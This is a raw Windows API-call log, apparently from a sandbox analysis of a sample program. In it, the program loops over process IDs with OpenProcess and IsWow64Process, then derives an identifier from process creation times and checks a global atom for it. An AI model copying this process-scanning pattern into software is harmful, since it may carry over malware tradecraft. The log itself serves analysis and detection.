	[0104.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.639] CloseHandle (hObject=0x694) returned 1
	[0104.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.639] CloseHandle (hObject=0x694) returned 1
	[0104.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.640] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.640] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.640] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.640] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.641] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.641] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.642] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.642] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.642] CloseHandle (hObject=0x694) returned 1
	[0104.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.642] CloseHandle (hObject=0x694) returned 1
	[0104.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.642] CloseHandle (hObject=0x694) returned 1
	[0104.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.642] CloseHandle (hObject=0x694) returned 1
	[0104.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.680] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.680] CloseHandle (hObject=0x694) returned 1
	[0104.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.680] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.680] CloseHandle (hObject=0x694) returned 1
	[0104.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.681] CloseHandle (hObject=0x694) returned 1
	[0104.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.681] CloseHandle (hObject=0x694) returned 1
	[0104.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.681] CloseHandle (hObject=0x694) returned 1
	[0104.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.681] CloseHandle (hObject=0x694) returned 1
	[0104.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.682] CloseHandle (hObject=0x694) returned 1
	[0104.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.682] CloseHandle (hObject=0x694) returned 1
	[0104.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.682] CloseHandle (hObject=0x694) returned 1
	[0104.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.682] CloseHandle (hObject=0x694) returned 1
	[0104.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.682] CloseHandle (hObject=0x694) returned 1
	[0104.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.683] CloseHandle (hObject=0x694) returned 1
	[0104.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.683] CloseHandle (hObject=0x694) returned 1
	[0104.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.683] CloseHandle (hObject=0x694) returned 1
	[0104.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.683] CloseHandle (hObject=0x694) returned 1
	[0104.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.683] CloseHandle (hObject=0x694) returned 1
	[0104.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.684] CloseHandle (hObject=0x694) returned 1
	[0104.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.684] CloseHandle (hObject=0x694) returned 1
	[0104.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.684] CloseHandle (hObject=0x694) returned 1
	[0104.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.684] CloseHandle (hObject=0x694) returned 1
	[0104.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.684] CloseHandle (hObject=0x694) returned 1
	[0104.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.685] CloseHandle (hObject=0x694) returned 1
	[0104.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.685] CloseHandle (hObject=0x694) returned 1
	[0104.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.685] CloseHandle (hObject=0x694) returned 1
	[0104.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.685] CloseHandle (hObject=0x694) returned 1
	[0104.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.685] CloseHandle (hObject=0x694) returned 1
	[0104.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.686] CloseHandle (hObject=0x694) returned 1
	[0104.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.686] CloseHandle (hObject=0x694) returned 1
	[0104.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.686] CloseHandle (hObject=0x694) returned 1
	[0104.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.686] CloseHandle (hObject=0x694) returned 1
	[0104.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.686] CloseHandle (hObject=0x694) returned 1
	[0104.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.687] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.687] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.687] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.687] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.688] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.688] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.688] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.688] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.688] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.688] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.688] CloseHandle (hObject=0x694) returned 1
	[0104.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.689] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.689] CloseHandle (hObject=0x694) returned 1
	[0104.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.689] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.689] CloseHandle (hObject=0x694) returned 1
	[0104.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.689] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.689] CloseHandle (hObject=0x694) returned 1
	[0104.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.724] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.724] CloseHandle (hObject=0x694) returned 1
	[0104.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.725] CloseHandle (hObject=0x694) returned 1
	[0104.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.725] CloseHandle (hObject=0x694) returned 1
	[0104.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.725] CloseHandle (hObject=0x694) returned 1
	[0104.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.726] CloseHandle (hObject=0x694) returned 1
	[0104.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.726] CloseHandle (hObject=0x694) returned 1
	[0104.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.726] CloseHandle (hObject=0x694) returned 1
	[0104.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.726] CloseHandle (hObject=0x694) returned 1
	[0104.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.726] CloseHandle (hObject=0x694) returned 1
	[0104.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.727] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.727] CloseHandle (hObject=0x694) returned 1
	[0104.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.727] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.727] CloseHandle (hObject=0x694) returned 1
	[0104.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.727] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.727] CloseHandle (hObject=0x694) returned 1
	[0104.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.728] CloseHandle (hObject=0x694) returned 1
	[0104.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.728] CloseHandle (hObject=0x694) returned 1
	[0104.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.728] CloseHandle (hObject=0x694) returned 1
	[0104.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.728] CloseHandle (hObject=0x694) returned 1
	[0104.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.728] CloseHandle (hObject=0x694) returned 1
	[0104.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.729] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.729] CloseHandle (hObject=0x694) returned 1
	[0104.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.729] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.729] CloseHandle (hObject=0x694) returned 1
	[0104.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.729] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.729] CloseHandle (hObject=0x694) returned 1
	[0104.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.729] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.729] CloseHandle (hObject=0x694) returned 1
	[0104.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.729] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.730] CloseHandle (hObject=0x694) returned 1
	[0104.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.730] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.730] CloseHandle (hObject=0x694) returned 1
	[0104.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.730] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.730] CloseHandle (hObject=0x694) returned 1
	[0104.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.730] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.730] CloseHandle (hObject=0x694) returned 1
	[0104.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.730] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.730] CloseHandle (hObject=0x694) returned 1
	[0104.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.730] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.730] CloseHandle (hObject=0x694) returned 1
	[0104.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.731] CloseHandle (hObject=0x694) returned 1
	[0104.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.731] CloseHandle (hObject=0x694) returned 1
	[0104.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.731] CloseHandle (hObject=0x694) returned 1
	[0104.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.731] CloseHandle (hObject=0x694) returned 1
	[0104.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.732] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.732] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.732] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.732] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.732] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.732] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.732] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.733] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.733] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.733] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.733] CloseHandle (hObject=0x694) returned 1
	[0104.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
